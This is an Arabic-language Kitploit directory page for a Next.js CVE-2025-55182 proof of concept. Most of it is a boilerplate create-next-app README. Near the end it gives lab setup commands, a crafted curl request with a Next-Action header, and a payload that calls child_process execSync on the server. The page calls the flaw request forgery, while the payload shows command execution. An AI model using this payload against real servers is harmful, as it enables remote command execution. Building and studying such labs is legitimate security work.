Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — إثبات مفهوم لاستغلال ثغرة CVE-2025-55182 التي تستهدف تزوير طلبات الخادم في Next.js عبر طلبات متعددة الأجزاء مصممة مع التلاعب برأس Next-Action. | Kitploit
أدوات/GitHubGitHub/gymnott1/cve-2025-55182
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubgymnott1/cve-2025-55182

CVE-2025-55182

إثبات مفهوم لاستغلال ثغرة CVE-2025-55182 التي تستهدف تزوير طلبات الخادم في Next.js عبر طلبات متعددة الأجزاء مصممة مع التلاعب برأس Next-Action.

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

هذا هو مشروع Next.js تم تهيئته باستخدام create-next-app.

البدء

أولاً، قم بتشغيل خادم التطوير:

root@kitploit:~
npm run dev
# أو
yarn dev
# أو
pnpm dev
# أو
bun dev

افتح http://localhost:3000 في متصفحك لرؤية النتيجة.

يمكنك البدء في تعديل الصفحة عن طريق تعديل app/page.tsx. الصفحة يتم تحديثها تلقائيًا عند تعديل الملف.

يستخدم هذا المشروع next/font لتحسين وتحميل Geist تلقائيًا، وهي عائلة خطوط جديدة لـ Vercel.

تعرف على المزيد

لمعرفة المزيد عن Next.js، ألق نظرة على الموارد التالية:

  • توثيق Next.js - تعرف على ميزات Next.js و API.
  • تعلم Next.js - برنامج تعليمي تفاعلي لـ Next.js.

يمكنك الاطلاع على مستودع Next.js على GitHub - ملاحظاتك ومساهماتك مرحب بها!

النشر على Vercel

أسهل طريقة لنشر تطبيق Next.js الخاص بك هي استخدام منصة Vercel من منشئي Next.js.

اطلع على توثيق نشر Next.js لمزيد من التفاصيل.

CVE-2025-55182

root@kitploit:~
npx create-next-app@latest react-vuln-lab
root@kitploit:~




npm install [email protected] [email protected] [email protected] --legacy-peer-deps
root@kitploit:~
curl -v http://localhost:3000/ \
-H "Content-Type: multipart/form-data; boundary=boundary" \
-H "Next-Action: <YOUR_ACTION_ID_HERE>" \
--data-binary @payload.txt
root@kitploit:~
- "_prefix": "require('child_process').execSync('whoami').toString()"
تنزيل الأداة